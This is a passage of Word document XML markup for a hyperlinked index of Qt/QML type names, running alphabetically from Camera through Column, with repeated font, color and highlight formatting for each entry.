                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Camera: QtMultimedia</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84" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Camera: Qt3D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85" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Camera3D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86" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CameraCapture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87" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CameraExposure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88" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CameraFlash</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89" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CameraFocus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90" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CameraImageProcessing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91" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CameraLens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792" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CameraRecorder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93" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CameraSelector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94" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CandlestickSeries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95" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CandlestickSet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96" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Canvas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97" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Canvas3D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98" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Canvas3DAbstractObject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799" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Canvas3DActiveInfo</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00" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Canvas3DBuffer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01" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Canvas3DContextAttributes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02" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Canvas3DFrameBuffer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03" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Canvas3DProgram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04" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Canvas3DRenderBuffer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05" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Canvas3DShader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06" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Canvas3DShaderPrecisionFormat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07" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Canvas3DTexture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08" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Canvas3DTextureProvider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09" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Canvas3DUniformLocation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10" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CanvasGradient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11" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CanvasImageData</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12" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CanvasPixelArray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13" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Category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14" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CategoryAxis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15" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CategoryAxis3D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16" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CategoryModel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17" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CategoryRange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18" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ChangeLanguageKey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19" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ChartView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20" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CheckBox: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21" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CheckBox: QtQuickControls2</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22" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CheckBoxStyle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23" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CheckDelegate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24" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CircularGauge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25" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CircularGaugeStyle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26" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ClearBuffers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27" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ClipPlane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28" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CloseEvent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29" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>color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30" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ColorAnimation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31" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ColorDialog: QtQuickDialogs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32" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ColorDialog: QtLabsPlatform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33" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ColorDialogRequest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34" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ColorGradient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35" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ColorGradientStop</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36" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Colorize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37" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ColorMask</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38" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ColorOverlay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39" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Column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40" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
